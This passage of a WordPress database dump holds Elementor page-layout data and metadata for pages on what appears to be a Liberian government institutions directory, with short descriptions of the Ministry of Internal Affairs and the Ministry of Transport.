url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"644e2d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners\\u2019 residences; schools; clinics markets; peace huts; latrines; wells; etc.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3cd232e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"58747a71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4bd205e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b1b1970\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mia\\\",\\\"tag_id\\\":\\\"59\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mia\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"177453a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"182afa84\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"375dd5cc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"78a5b2a8\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mia\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27441,3986,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27442,3986,'_thumbnail_id','3524'),(27443,1610,'internet','https://www.mia.gov.lr/'),(27444,1610,'_pods_institution_logo','a:1:{i:0;i:2672;}'),(27445,1610,'institution_logo','2672'),(27446,1606,'_last_editor_used_jetpack','classic-editor'),(27448,3987,'_elementor_edit_mode','builder'),(27449,3987,'_elementor_template_type','wp-post'),(27450,3987,'_elementor_version','2.7.5'),(27451,3987,'_wp_page_template','default'),(27452,3987,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ba7389\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LiMA coming soon!<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5cce3400\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"18267993\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"37219f1f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ab5334\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lima\\\",\\\"tag_id\\\":\\\"58\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lima\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"55f0c58f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"126f7a36\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"41e8be5a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1f1d95fa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lima\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27453,3987,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27454,3987,'_thumbnail_id','3189'),(27456,1606,'internet','http://www.lima.gov.lr/'),(27457,1606,'_pods_institution_logo','a:1:{i:0;i:2677;}'),(27458,1606,'institution_logo','2677'),(27459,1604,'_last_editor_used_jetpack','classic-editor'),(27460,3988,'_wp_attached_file','2019/11/ncbil.png'),(27461,3988,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:114;s:6:\"height\";i:112;s:4:\"file\";s:17:\"2019/11/ncbil.png\";s:5:\"sizes\";a:1:{s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"ncbil-114x85.png\";s:5:\"width\";i:114;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27462,1604,'internet','https://web.facebook.com/nbcliberia/?_rdc=1&_rdr'),(27463,1604,'_pods_institution_logo','a:1:{i:0;i:3988;}'),(27466,1598,'_last_editor_used_jetpack','classic-editor'),(27467,1596,'_last_editor_used_jetpack','classic-editor'),(27468,3990,'_elementor_edit_mode','builder'),(27469,3990,'_elementor_template_type','wp-post'),(27470,3990,'_elementor_version','2.7.5'),(27471,3990,'_wp_page_template','default'),(27472,3990,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2d39894\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.<\\/p><p>Through its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"52624ff6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"6d47854\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3c330365\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"30a16cc2\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mot\\\",\\\"tag_id\\\":\\\"62\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mot\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6bd3aa21\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"69e27fd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df2b844\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9e5ee94\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mot\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27473,3990,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27474,3990,'_thumbnail_id','3215'),(27476,3991,'_elementor_edit_mode','builder'),(27477,3991,'_elementor_template_type','wp-post'),(27478,3991,'_elementor_version','2.7.5'),(27479,3991,'_wp_page_template','default'),